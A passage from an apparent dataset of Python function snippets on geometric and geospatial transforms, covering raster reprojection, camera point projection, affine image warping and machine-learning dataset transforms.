composed_with_transform(self, w2w_transform):\n if not w2w_transform.input_space == self.world_space:\n raise CompositionError(\n \"The transform given does not apply to \"\n \"the image's world space:\\n%s\\n\\n%s\" % \n (w2w_transform, self)\n )\n new_img = self._apply_transform(w2w_transform)\n new_img.world_space = w2w_transform.output_space\n return new_img", "def do_transform_point(transform: Transform, point: Point) -> Point:\n\n transform_mat = 
alloy.math.transformation_matrix_from_array(alloy.ros.transform_to_numpy(transform))\n point_np = alloy.ros.point_to_numpy(point)\n point_np = np.append(point_np, 1).reshape((4,1))\n trans_point = np.matmul(transform_mat, point_np)\n return alloy.ros.numpy_to_point(trans_point[0:3,0])", "def transform_to(self, frame):\n if self.component_type == \"healpix\":\n raise ValueError(\n \"Direct coordinate transformation between frames is not valid \"\n \"for `healpix` type catalogs. Please use the `healpix_interp_transform` \"\n \"to transform to a new frame and interpolate to the new pixel centers. \"\n \"Alternatively, you can call `healpix_to_point` to convert the healpix map \"\n \"to a point source catalog before calling this function.\"\n )\n\n new_skycoord = self.skycoord.transform_to(frame)\n self.skycoord = new_skycoord\n\n return", "def reproject_GeoGrid(geogrid_in, srs_string,\n out_xdim=None, out_ydim=None, out_geotransform=None,\n out_nodata_value=None, interp_method=None):\n src = geogrid_as_gdalInMem(geogrid_in)\n\n out_srs = osr.SpatialReference()\n assign_projection_to_srs(out_srs, srs_string)\n out_wkt = out_srs.ExportToWkt()\n\n dst_gdal_datatype = get_gdal_datatype(geogrid_in.data_array.dtype)\n\n try:\n dst = gdal.GetDriverByName('MEM').Create(\n '',\n out_xdim,\n out_ydim,\n 1,\n dst_gdal_datatype,\n )\n dst.SetGeoTransform(out_geotransform)\n dst.SetProjection(out_wkt)\n except ValueError:\n raise ValueError('Error creating dst in reproject_GeoGrid()')\n except AttributeError:\n raise ValueError('AttributeError in dst creation')\n\n\n gdal_interp_method = getGdalInterpMethod(interp_method)\n res = gdal.ReprojectImage(src,\n dst,\n src.GetProjection(),\n dst.GetProjection(),\n gdal_interp_method,\n )\n\n\n return geogrid_from_gdalInMem(dst)", "def apply_transform_to_image(self,img, transform, center=None):\n \n if center is None:\n center = (np.array(img.shape)[::-1]-1)/2.0\n \n displacement = np.dot(transform, center)\n shift = center - displacement\n \n img_tf = ndimage.interpolation.affine_transform(img, transform, offset=shift, mode=\"constant\", order=3, cval=0.0)\n return img_tf", "def apply_transform_matrix(self, img: np.ndarray, transform_matrix):\n h, w = img.shape[0], img.shape[1]\n transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)\n img = np.rollaxis(img, 2, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n\n channel_images = [scipy.ndimage.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=1,\n mode=self.fill_mode,\n cval=self.cval) for x_channel in img]\n img = np.stack(channel_images, axis=0)\n img = np.rollaxis(img, 0, 2 + 1)\n # img = apply_affine_transform(img, transform_matrix, channel_axis=2, fill_mode=self.fill_mode, cval=self.cval) # apply_transform\n return img", "def replace_current_transform_group(self, transform):\n datacopy = self._shallow_clone_dataset()\n fdata = datacopy._flat_data\n datacopy._flat_data = fdata.replace_current_transform_group(transform)\n return datacopy", "def projection(self, point):\n projected_point = self._iterate_over_factors(\"projection\", {\"point\": point})\n return projected_point", "def transform(self, coord_trans, clone=False):\n if clone:\n klone = self.clone()\n klone.transform(coord_trans)\n return klone\n\n # Depending on the input type, use the appropriate OGR routine\n # to perform the transformation.\n if isinstance(coord_trans, CoordTransform):\n capi.geom_transform(self.ptr, coord_trans.ptr)\n elif 
isinstance(coord_trans, SpatialReference):\n capi.geom_transform_to(self.ptr, coord_trans.ptr)\n elif isinstance(coord_trans, (int, str)):\n sr = SpatialReference(coord_trans)\n capi.geom_transform_to(self.ptr, sr.ptr)\n else:\n raise TypeError(\n \"Transform only accepts CoordTransform, \"\n \"SpatialReference, string, and integer objects.\"\n )", "def reproject_raster_dataset(src_ds, **kwargs):\n\n # checking kwargs\n spacing = kwargs.pop(\"spacing\", None)\n size = kwargs.pop(\"size\", None)\n resample = kwargs.pop(\"resample\", gdal.GRA_Bilinear)\n src_srs = kwargs.pop(\"projection_source\", None)\n dst_srs = kwargs.pop(\"projection_target\", None)\n align = kwargs.pop(\"align\", False)\n\n if spacing is None and size is None:\n raise NameError(\"Whether keyword 'spacing' or 'size' must be given\")\n\n if spacing is not None and size is not None:\n warnings.warn(\n \"both ``spacing`` and ``size`` kwargs given, ``size`` will be ignored.\",\n UserWarning,\n )\n\n # Get the GeoTransform vector\n src_geo = src_ds.GetGeoTransform()\n x_size = src_ds.RasterXSize\n y_size = src_ds.RasterYSize\n\n # get extent\n ulx = src_geo[0]\n uly = src_geo[3]\n lrx = src_geo[0] + src_geo[1] * x_size\n lry = src_geo[3] + src_geo[5] * y_size\n\n extent = np.array([[[ulx, uly], [lrx, uly]], [[ulx, lry], [lrx, lry]]])\n\n if dst_srs:\n # try to load projection from source dataset if None is given\n if src_srs is None:\n src_proj = src_ds.GetProjection()\n if not src_proj:\n raise ValueError(\n \"src_ds is missing projection information, please use ``projection_source`` kwarg and provide a fitting OSR SRS object.\"\n )\n src_srs = osr.SpatialReference()\n src_srs.ImportFromWkt(src_ds.GetProjection())\n\n # Transformation\n extent = georef.reproject(\n extent, projection_source=src_srs, projection_target=dst_srs\n )\n\n # wkt needed\n src_srs = src_srs.ExportToWkt()\n dst_srs = dst_srs.ExportToWkt()\n\n (ulx, uly, urx, ury, llx, lly, lrx, lry) = tuple(list(extent.flatten().tolist()))\n\n # align grid to destination raster or UL-corner point\n if align:\n try:\n ulx, uly = align\n except TypeError:\n pass\n\n ulx = int(max(np.floor(ulx), np.floor(llx)))\n uly = int(min(np.ceil(uly), np.ceil(ury)))\n lrx = int(min(np.ceil(lrx), np.ceil(urx)))\n lry = int(max(np.floor(lry), np.floor(lly)))\n\n # calculate cols/rows or xspacing/yspacing\n if spacing:\n try:\n x_ps, y_ps = spacing\n except TypeError:\n x_ps = spacing\n y_ps = spacing\n\n cols = int(abs(lrx - ulx) / x_ps)\n rows = int(abs(uly - lry) / y_ps)\n elif size:\n cols, rows = size\n x_ps = x_size * src_geo[1] / cols\n y_ps = y_size * abs(src_geo[5]) / rows\n\n # create destination in-memory raster\n mem_drv = gdal.GetDriverByName(\"MEM\")\n\n # and set RasterSize according ro cols/rows\n dst_ds = mem_drv.Create(\"\", cols, rows, 1, gdal.GDT_Float32)\n\n # Create the destination GeoTransform with changed x/y spacing\n dst_geo = (ulx, x_ps, src_geo[2], uly, src_geo[4], -y_ps)\n\n # apply GeoTransform to destination dataset\n dst_ds.SetGeoTransform(dst_geo)\n\n # apply Projection to destination dataset\n if dst_srs is not None:\n dst_ds.SetProjection(dst_srs)\n\n # nodata handling, need to initialize dst_ds with nodata\n src_band = src_ds.GetRasterBand(1)\n nodata = src_band.GetNoDataValue()\n dst_band = dst_ds.GetRasterBand(1)\n if nodata is not None:\n dst_band.SetNoDataValue(nodata)\n dst_band.WriteArray(np.ones((rows, cols)) * nodata)\n dst_band.FlushCache()\n\n # resample and reproject dataset\n gdal.ReprojectImage(src_ds, dst_ds, src_srs, dst_srs, 
resample)\n\n return dst_ds", "def _get_transform(self, transform):\n try:\n from cartopy.crs import CRS\n except ModuleNotFoundError:\n CRS = None\n cartopy = getattr(self, 'name', None) == 'proplot_cartopy'\n if (\n isinstance(transform, mtransforms.Transform)\n or CRS and isinstance(transform, CRS)\n ):\n return transform\n elif transform == 'figure':\n return self.figure.transFigure\n elif transform == 'axes':\n return self.transAxes\n elif transform == 'data':\n return PlateCarree() if cartopy else self.transData\n elif cartopy and transform == 'map':\n return self.transData\n else:\n raise ValueError(f'Unknown transform {transform!r}.')", "def __update_dataset(self, crs, transform, nodata=None):\r\n\r\n meta = {\r\n \"driver\": \"GTiff\",\r\n \"dtype\": self.__arr.dtype,\r\n \"nodata\": nodata,\r\n \"height\": self.__arr.shape[-2],\r\n \"width\": self.__arr.shape[-1],\r\n \"count\": self.__arr.shape[0],\r\n \"crs\": crs,\r\n \"transform\": transform,\r\n }\r\n\r\n memfile = MemoryFile()\r\n with memfile.open(**meta) as ds:\r\n ds.write(self.__arr)\r\n self.dataset = memfile.open()\r\n memfile.close()", "def reproject_dataset(filename):\n\n # We want to project the GeoTIFF coordinate reference system (crs)\n # to WGS84 (e.g. into the familiar Lat/Lon pairs). WGS84 is analogous\n # to EPSG:4326\n dst_crs = 'EPSG:4326'\n\n with rasterio.open(filename) as src:\n transform, width, height = rasterio.warp.calculate_default_transform(\n src.crs, dst_crs, src.width, src.height, *src.bounds)\n kwargs = src.meta.copy()\n kwargs.update({\n 'crs': dst_crs,\n 'transform': transform,\n 'width': width,\n 'height': height,\n 'compress': 'lzw'\n })\n\n out_path = filename.split('.tif')[0] + '.wgs84.tif'\n with rasterio.open(out_path, 'w', **kwargs) as dst:\n for i in range(1, src.count + 1):\n rasterio.warp.reproject(\n source=rasterio.band(src, i),\n destination=rasterio.band(dst, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=transform,\n dst_crs=dst_crs,\n resampling=rasterio.warp.Resampling.nearest)\n\n return out_path", "def project_points(X, K, R, T, distortion_flag=False, distortion_params=None):\n # Project points from 3d world coordinates to 2d image coordinates\n\n #get projection matrix\n pmatrix = projection_matrix(R, T, K)\n\n #add 4th component to points\n ones = np.ones([1,len(X[0])])\n xones=np.row_stack((X,ones))\n\n #calculate pixel coordinates\n X_camera = pmatrix.dot(xones)\n\n return X_camera", "def reproject(src_path, out_path, target_crs='EPSG:4326'):\n\n # load satdata\n satdata = load(src_path)\n\n # calculate a transform and new dimensions using our dataset's current CRS and dimensions\n transform, width, height = calculate_default_transform(satdata.crs,\n target_crs,\n satdata.width,\n satdata.height,\n *satdata.bounds)\n\n # Using a copy of the metadata from the clipped raster dataset and the transform we defined above,\n # we can write a new geoTIFF containing the reprojected and clipped raster data:\n metadata = satdata.meta.copy()\n\n # Change the CRS, transform, and dimensions in metadata to match our desired output dataset\n metadata.update({'crs':target_crs,\n 'transform':transform,\n 'width':width,\n 'height':height})\n\n # apply the transform & metadata to perform the reprojection\n with rasterio.open(out_path, 'w', **metadata) as reprojected:\n for band in range(1, satdata.count + 1):\n rasterio_reproject(\n source=rasterio.band(satdata, band),\n destination=rasterio.band(reprojected, band),\n src_transform=satdata.transform,\n 
src_crs=satdata.crs,\n dst_transform=transform,\n dst_crs=target_crs\n )", "def CopyTransform(transform):\n return copy.copy(transform)", "def apply_transform_on_3d_image(image: torch.Tensor, transforms: List[Callable]) -> torch.Tensor:\n for z in range(image.shape[0]):\n pil = TF.to_pil_image(image[z])\n for transform_fn in transforms:\n pil = transform_fn(pil)\n image[z] = TF.to_tensor(pil).squeeze()\n return image", "def reproject_coordinates(coordinates, inproj, outproj, flat=False):\n if flat:\n return np.array([transform(inproj, outproj, coord[0], coord[1]) for coord in coordinates]).flatten()\n return [list(transform(inproj, outproj, coord[0], coord[1])) for coord in coordinates]", "def testCalculateTransform(self):\n # Create some points in the first frame.\n z = 4.0\n self.evaluator.camera_height = z\n first_points = numpy.array(\n [[0, 0, z], [2, 0, z], [2, 5, z], [0, 5, z]], dtype=numpy.float32)\n # Create a transformation that will move the camera\n R = numpy.array([[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])\n t = numpy.array([[3.0], [-5.0], [0.0]])\n expected_result = numpy.eye(4)\n expected_result[0:3, 0:3] = R\n expected_result[0:3, 3:] = t\n # Determine where the second points would be given that.\n second_points = (numpy.matmul(\n R, first_points.transpose()) + t).transpose()\n # Create a simple intrinsic matrix to project onto a fictional camera\n intrinsic = numpy.array(\n [[1.0, 0.0, 20.0], [0.0, 1.0, 20.0], [0.0, 0.0, 1.0]])\n # Use no distortion or transformations\n rvec = numpy.zeros((3, 1))\n tvec = rvec\n distortion = numpy.zeros((5, 1))\n # Project the points into the camera\n (camera_first_points, _) = cv2.projectPoints(\n first_points, rvec, tvec, intrinsic, distortion)\n camera_first_points = camera_first_points.squeeze()\n (camera_second_points, _) = cv2.projectPoints(\n second_points, rvec, tvec, intrinsic, distortion)\n camera_second_points = camera_second_points.squeeze()\n # Using these projected points, can the object recover the correct initial transform\n result = self.evaluator._calculateTransform(\n camera_first_points, camera_second_points, intrinsic)\n # The matrix comparisions aren't reliable near zero, so check elements manually.\n for i in range(expected_result.shape[0]):\n for j in range(expected_result.shape[1]):\n result_element = result[i, j]\n expected_element = expected_result[i, j]\n self.assertAlmostEqual(result_element, expected_element, 6,\n 'Matrix element ({0:d}, {1:d}) is incorrect.'.format(i, j))", "def transform(self, X, copy=...):\n ...", "def transform(self, X, copy=...):\n ...", "def transform(self, X, copy=...):\n ...", "def project_point(self, point: Point3D) -> Point3D:\n x, y, z = point\n cam_x, cam_y, cam_z = self._pos\n x -= cam_x\n y -= cam_y\n z -= cam_z\n dx = self._cy*(self._sz*y + self._cz*x) - self._sy*z\n dy = self._sx*(self._sy*(self._sz*y + self._cz*x) + self._cy*z) + self._cx*(self._cz*y - self._sz*x)\n dz = self._cx*(self._sy*(self._sz*y + self._cz*x) + self._cy*z) - self._sx*(self._cz*y - self._sz*x)\n return self._scale * dx/dz, self._scale * dy/dz, dz", "def transform(self, R, t, scale = 1):\n\n # Build 4-by-4 projection matrix from args ----------------------------\n # This is what we are doing internally:\n # Proj = np.r_[ scale * np.c_[R, t], [[0, 0, 0, 1]] ]\n # InvProj = np.r_[ scale * np.c_[R.T, -np.dot(R.T, t)], [[0,0,0,scale]] ]\n Proj = tf_format.tf_format('4x4', R, t)\n Proj[:-1,:] *= scale\n InvProj = tf_format.tf_format('i4x4', R, t) * scale\n \n \n # Apply transformation to pts3D 
---------------------------------------\n if self.pts3D is not None and self.pts3D.shape[1] > 0:\n # Use homogeneous coords\n pts3D = np.r_[self.pts3D, np.ones((1, self.pts3D.shape[1]))]\n pts3D = np.dot(Proj, pts3D)\n self.pts3D = pts3D[:3, :]\n\n # Apply transformation to cameras -------------------------------------\n # Camera poses are stored using camera-to-world transformations, we \n # need to invert the projection matrix for this to work --> \n # we use InvProj\n\n cposes = self.cam_poses\n for i in range(cposes.shape[1]):\n\n # Extract camera projection matrix\n p_cam = tf_format.tf_format('4x4', cposes[:, i])\n\n # Transform camera projection matrix\n new_p_cam = np.dot(p_cam, InvProj)\n \n # Make sure it's a true rotation!\n [u, s, vT] = np.linalg.svd(new_p_cam[:3,:3])\n cposes[:3, i] = tf_format.rodrigues( np.dot(u,vT) ).ravel()\n cposes[3:, i] = new_p_cam[:3, 3]\n\n self.cam_poses = cposes", "def transform(self, X, y=None):\n X = X.copy()\n if isinstance(self.transformation, BaseEstimator):\n X[self.columns_to_transform_] = self.transformation.transform(\n X[self.columns_to_transform_]\n )\n else:\n X[self.columns_to_transform_] = X[self.columns_to_transform_].applymap(\n self.transformation\n )\n\n return X", "def four_point_transform(image, pts):\n\n\tmax_x, max_y = np.max(pts[:, 0]).astype(np.int32), np.max(pts[:, 1]).astype(np.int32)\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[image.shape[1] - 1, 0],\n\t\t[image.shape[1] - 1, image.shape[0] - 1],\n\t\t[0, image.shape[0] - 1]], dtype=\"float32\")\n\n\twarped = cv2.warpPerspective(image, cv2.getPerspectiveTransform(dst, pts), (max_x, max_y))\n\n\treturn warped", "def _build_geotransform(self, i, j):\n assert isinstance(i, int), (\"i is not an integer\")\n assert isinstance(j, int), (\"j is not an integer\")\n x_origin, x_res, x_ignore, y_origin, y_ignore, y_res = (\n self.image_metadata.geotransform)\n # integer conversion to reduce floating point error\n new_x_origin = self._calculate_origin(x_origin, x_res, self.offset, j)\n new_y_origin = self._calculate_origin(y_origin, y_res, self.offset, i)\n geotransform = (new_x_origin, x_res, x_ignore, new_y_origin, \n y_ignore, y_res) \n return geotransform", "def project(self, point_cloud, round_px=True):\n if not isinstance(point_cloud, PointCloud) and not (isinstance(point_cloud, Point) and point_cloud.dim == 3):\n raise ValueError('Must provide PointCloud or 3D Point object for projection')\n if point_cloud.frame != self._frame:\n raise ValueError('Cannot project points in frame %s into camera with frame %s' %(point_cloud.frame, self._frame))\n\n points_proj = self.S.dot(point_cloud.data) + self.t\n if len(points_proj.shape) == 1:\n points_proj = points_proj[:, np.newaxis]\n point_depths = np.tile(points_proj[2,:], [3, 1])\n points_proj = np.divide(points_proj, point_depths)\n if round_px:\n points_proj = np.round(points_proj)\n\n if isinstance(point_cloud, Point):\n return Point(data=points_proj[:2,:].astype(np.int16), frame=self._frame)\n return ImageCoords(data=points_proj[:2,:].astype(np.int16), frame=self._frame)", "def project(self, point):\n return np.round(project(self.camera.P, point)).astype(int)", "def map(self, obj):\n if isinstance(obj, np.ndarray) and obj.ndim >= 2 and obj.shape[0] in (2,3):\n return fn.transformCoordinates(self, obj)\n else:\n return QtGui.QMatrix4x4.map(self, obj)", "def apply_projection(projection, dataset):\n out = DatasetType(name=dataset.name, attributes=dataset.attributes)\n\n for var in projection:\n target, template = out, dataset\n while 
var:\n name, slice_ = var.pop(0)\n candidate = template[name]\n \n # apply slice\n if slice_:\n if isinstance(candidate, BaseType):\n candidate.data = candidate[slice_]\n elif isinstance(candidate, SequenceType):\n candidate = candidate[slice_[0]]\n elif isinstance(candidate, GridType):\n candidate = candidate[slice_]\n\n # handle structures\n if isinstance(candidate, StructureType):\n # add variable to target\n if name not in target.keys():\n if var:\n # if there are more children to add we need to clear the\n # candidate so it has only explicitly added children; \n # also, Grids are degenerated into Structures\n if isinstance(candidate, GridType):\n candidate = StructureType(candidate.name, candidate.attributes)\n candidate._keys = []\n target[name] = candidate\n target, template = target[name], template[name]\n else:\n target[name] = candidate\n\n # fix sequence data, including only variables that are in the sequence\n for seq in walk(out, SequenceType):\n seq.data = get_var(dataset, seq.id)[tuple(seq.keys())].data\n\n return out", "def project(points, camera_params, theta):\n \"\"\"\n Function takes input of 3d_points, transformations and Convert 3-D points to 2-D by projecting onto images. \n Input:\n points: 3D points in world frame\n camera_params: parameters of camera corrosponding to the point\n theta: Needed For PAL camera to specify the sub camera index for the points\n Output:\n points_proj: 2D reprojected points for 3D points \n\n \"\"\"\n # Convert the 3D points to Camera Frame by rotaion followes by translation\n points_proj1 = rotate(points[:,0:3], camera_params[:, :3])\n points_proj1 += camera_params[:, 3:6]\n # FOR PAL: Converting into the Sub-camera Frame by respective rotation\n thetas = theta * np.pi / 3 \n points_proj = np.copy(points_proj1)\n points_proj[:,0] = points_proj1[:,0]*np.cos(thetas) - points_proj1[:,2]*np.sin(thetas)\n points_proj[:,2] = points_proj1[:,0]*np.sin(thetas) + points_proj1[:,2]*np.cos(thetas)\n # Avoiding Zero error\n for i in range(len(points_proj)):\n if(points_proj[i,2]==0):\n points_proj[i,0] = 0\n points_proj[i,1] = 0\n points_proj[i,2] = 1\n # 2D projection\n points_proj = points_proj[:, :2] / points_proj[:, 2, np.newaxis]\n f = camera_params[:, 6]\n k1 = camera_params[:, 7]\n k2 = camera_params[:, 8]\n n = np.sum(points_proj**2, axis=1)\n r = 1 + k1 * n + k2 * n**2\n points_proj *= (r * f)[:, np.newaxis]\n return points_proj", "def update_transform(self, transform: Optional[torchvision.transforms.Compose],\n train: bool = True) -> 'BaseDataset':\n if train:\n self.train_transform = transform\n else:\n self.val_transform = transform\n return self", "def project_drawn(cb, msg):\n stream = cb.streams[0]\n old_data = stream.data\n stream.update(data=msg['data'])\n element = stream.element\n stream.update(data=old_data)\n proj = cb.plot.projection\n if not isinstance(element, _Element) or element.crs == proj:\n return None\n crs = element.crs\n element.crs = proj\n return project(element, projection=crs)", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=1,\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x", "def coordinate_transform_proj4(proj1, proj2, 
coords):\n\n srs1 = osr.SpatialReference()\n srs2 = osr.SpatialReference()\n srs1.ImportFromProj4(proj1)\n srs2.ImportFromProj4(proj2)\n\n return coordinate_transform(srs1, srs2, coords)", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=0,\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x", "def deproject_pixel(self, depth, pixel):\n if not isinstance(pixel, Point) and not pixel.dim == 2:\n raise ValueError('Must provide 2D Point object for pixel projection')\n if pixel.frame != self._frame:\n raise ValueError('Cannot deproject pixel in frame %s from camera with frame %s' %(pixel.frame, self._frame))\n\n point = np.r_[pixel.data, depth]\n point_3d = np.linalg.inv(self.S).dot(point - self.t)\n return Point(data=point_3d, frame=self._frame)", "def transform_coord(proj1, proj2, x, y):\r\n\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def transform_coord(proj1, proj2, x, y):\r\n\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def computeProjection(skyPictureInstance_id):\n \n skyPictureInstance = SkyPicture.objects.get(id = skyPictureInstance_id)\n \n # Check if it has not already been computed for this instance\n if not skyPictureInstance.undistorted or skyPictureInstance.undistorted == 'undistorted/TODO.png':\n img = np.asarray(Image.open(os.path.join(settings.BASE_DIR, skyPictureInstance.image.url[1:])))\n \n if img.shape[0] > img.shape[1]:\n img = np.rot90(img)\n \n img = np.flip(img,0)\n \n img = img[:, (np.shape(img)[1]/2 - np.shape(img)[0]/2):(np.shape(img)[1]/2 + np.shape(img)[0]/2), :]\n img = transparency(img)\n img_pil_response = Image.fromarray(img, \"RGBA\")\n \n # fetch image into memory\n temp_handle = StringIO()\n img_pil_response.save(temp_handle, 'PNG', option='optimize')\n temp_handle.seek(0)\n \n filename = skyPictureInstance.date.strftime(\"%Y-%m-%d-\") + skyPictureInstance.time.strftime(\"%H-%M-%S.png\")\n suf = SimpleUploadedFile(filename, temp_handle.read(), content_type='image/png')\n skyPictureInstance.undistorted.save(filename, suf, False)\n skyPictureInstance.save()", "def project_points(points, cam_matrix, trans, rot):\n\n # STEP 1: Transform pointcloud into new reference frame.\n points = np.dot(rot, points) + trans[:, None]\n\n # STEP 2: Project new pointcloud onto image frame using K matrix.\n # gives a 3 x N array of image plane coordinates in homogenous coordinates.\n homo_pixel_coords = np.dot(cam_matrix, points)\n\n # STEP 3: Convert homogenous coordinates to regular 2D coordinates.\n # To do this, you need to divide the first two coordinates of homo_pixel_coords\n # by the third coordinate.\n pixel_coords = homo_pixel_coords[:2] / homo_pixel_coords[2]\n\n # STEP 4: Convert to integers. 
Take the floor of pixel_coords then cast it\n # to an integer type, like numpy.int32\n pixel_coords = np.int32(np.floor(pixel_coords))\n\n return pixel_coords", "def xprojection(self):\n return self.image.sum(axis=0)", "def transform_coord(proj1, proj2, x, y):\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def displace_to_pose(img, depth, pose, intrinsics, intrinsics_inv, rotation_mode='euler', padding_mode='zeros', return_coordinates=False):\n check_sizes(img, 'img', 'B3HW')\n\n src_pixel_coords = get_displacement_pixel_transformation(img, depth, pose, intrinsics, intrinsics_inv, rotation_mode=rotation_mode, padding_mode=padding_mode)\n projected_img = torch.nn.functional.grid_sample(img, src_pixel_coords, padding_mode=padding_mode)\n if return_coordinates:\n return projected_img, src_pixel_coords\n else:\n return projected_img", "def transform(self, data):\n return self.fit_transform(data, fitting=False)", "def _transform(\n self, x: \"torch.Tensor\", y: Optional[\"torch.Tensor\"], **kwargs\n ) -> Tuple[\"torch.Tensor\", Optional[\"torch.Tensor\"]]:\n import torch\n import torchvision.transforms.functional as F\n\n img_size = x.shape[:2]\n\n angle = float(\n torch.empty(1)\n .uniform_(float(self.degree_range[0]), float(self.degree_range[1]))\n .item()\n )\n\n max_dx = float(self.translate[0] * img_size[1])\n max_dy = float(self.translate[1] * img_size[0])\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translations = (tx, ty)\n\n scale = float(torch.empty(1).uniform_(self.scale[0], self.scale[1]).item())\n\n # x needs to have channel first\n x = x.permute(2, 0, 1)\n x = F.affine(\n img=x, angle=angle, translate=translations, scale=scale, shear=(0.0, 0.0)\n )\n x = x.permute(1, 2, 0)\n\n return torch.clamp(x, min=self.clip_values[0], max=self.clip_values[1]), y", "def transform(self, dataset: NumpyOrPandas) -> NumpyDataset:\n # checks here\n super().transform(dataset)\n # convert to accepted dtype and get attributes\n dataset = dataset.to_pandas()\n df = dataset.data\n\n # transform\n roles = NumericRole()\n outputs = []\n\n for n, conlumn_name in enumerate(df.columns):\n if self.cache_dir is not None:\n full_hash = get_textarr_hash(df[conlumn_name]) + get_textarr_hash(self.dicts[conlumn_name][\"feats\"])\n fname = os.path.join(self.cache_dir, full_hash + \".pkl\")\n\n if os.path.exists(fname):\n logger.info3(f\"Load saved dataset for {conlumn_name}\")\n\n with open(fname, \"rb\") as f:\n new_arr = pickle.load(f)\n\n else:\n new_arr = self.dicts[conlumn_name][\"transformer\"].transform(df[conlumn_name])\n with open(fname, \"wb\") as f:\n pickle.dump(new_arr, f)\n else:\n new_arr = self.dicts[conlumn_name][\"transformer\"].transform(df[conlumn_name])\n\n output = dataset.empty().to_numpy()\n output.set_data(new_arr, self.dicts[conlumn_name][\"feats\"], roles)\n outputs.append(output)\n logger.info3(f\"Feature {conlumn_name} transformed\")\n # create resulted\n return dataset.empty().to_numpy().concat(outputs)", "def get_transform(self, map_from='visual', map_to='render'):\n return self.transforms.get_transform(map_from, map_to)", "def get_transform(self, from_frame, to_frame):\n if not self._pipeline:\n return None\n try:\n from_ind = self._get_frame_index(from_frame)\n except ValueError:\n raise CoordinateFrameError(\"Frame {0} is not in 
the available \"\n \"frames\".format(from_frame))\n try:\n to_ind = self._get_frame_index(to_frame)\n except ValueError:\n raise CoordinateFrameError(\"Frame {0} is not in the available frames\".format(to_frame))\n if to_ind < from_ind:\n #transforms = np.array(self._pipeline[to_ind: from_ind], dtype=\"object\")[:, 1].tolist()\n transforms = [step.transform for step in self._pipeline[to_ind: from_ind]]\n transforms = [tr.inverse for tr in transforms[::-1]]\n elif to_ind == from_ind:\n return None\n else:\n #transforms = np.array(self._pipeline[from_ind: to_ind], dtype=\"object\")[:, 1].copy()\n transforms = [step.transform for step in self._pipeline[from_ind: to_ind]]\n return functools.reduce(lambda x, y: x | y, transforms)", "def _transform(self, X, y=None):\n return clone(self.transformer).fit_transform(X=X, y=y)", "def apply_transform(x, transform_matrix, channel_index=0, fill_mode='nearest', cval=0.):\n x = np.rollaxis(x, channel_index, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(x_channel,\n final_affine_matrix,\n final_offset, order=0, mode=fill_mode, cval=cval)\n for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_index+1)\n return x", "def get_dataset_transform(dataset_name):\n if dataset_name == \"MNIST\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n elif dataset_name == \"CIFAR10\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n elif dataset_name == \"CIFAR100\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n elif dataset_name == \"EMNIST\":\n train_transform = transforms.Compose([\n Transpose(),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n test_transform = transforms.Compose([\n Transpose(),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n else:\n print(\"current dataset name:{} is not right\".format(dataset_name))\n sys.exit(1)\n return train_transform, test_transform", "def transformAffine(self, path=None, src=None, dst=None):\n if path is not None:\n landmarks = pd.read_csv(path, skiprows=1,engine=\"c\", na_filter=False, header=None, delim_whitespace=True, dtype=np.float32).as_matrix()\n dst = landmarks[:,3:5]\n src = landmarks[:,1:3]\n affine = 